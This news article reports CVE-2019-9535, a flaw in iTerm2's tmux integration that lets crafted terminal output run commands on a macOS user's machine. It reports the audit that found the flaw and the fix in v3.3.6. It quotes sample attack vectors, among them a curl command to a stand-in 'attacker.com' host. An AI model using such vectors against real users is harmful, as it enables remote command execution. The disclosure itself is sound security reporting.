A critical vulnerability (CVE-2019-9535) in iTerm2, a macOS terminal emulator frequently used by developers and system administrators, could allow attackers to take control of a target system.
“An attacker who can produce output to the terminal can, in many cases, execute commands on the user’s computer,” Mozilla explained.
“Example attack vectors for this would be connecting to an attacker-controlled SSH server or commands like curl http://attacker.com and tail -f /var/log/apache2/referer_log. We expect the community will find many more creative examples.”
About the vulnerability (CVE-2019-9535)
The vulnerability is in the tmux integration feature of iTerm2 and has been present for at least seven years.
It was discovered by researchers with Radically Open Security, a non-profit computer security consultancy that performed a security audit of the popular open source terminal emulator.
The project was funded by the Mozilla Open Source Support Program (MOSS), which finances security audits for widely used open source software and the remedial work needed to fix the discovered problems.
No additional details about CVE-2019-9535 have been disclosed, though the change in the software’s code could provide some insight to those who can make sense of it.
“This is a serious security issue because in some circumstances it could allow an attacker to execute commands on your machine when you view a file or otherwise receive input they have crafted in iTerm2,” iTerm2 developer George Nachman noted in the changelog for v3.3.6, which fixes the flaw.
The issue affects all versions released before this last one. Users are urged to update manually instead of waiting for an update prompt from the software.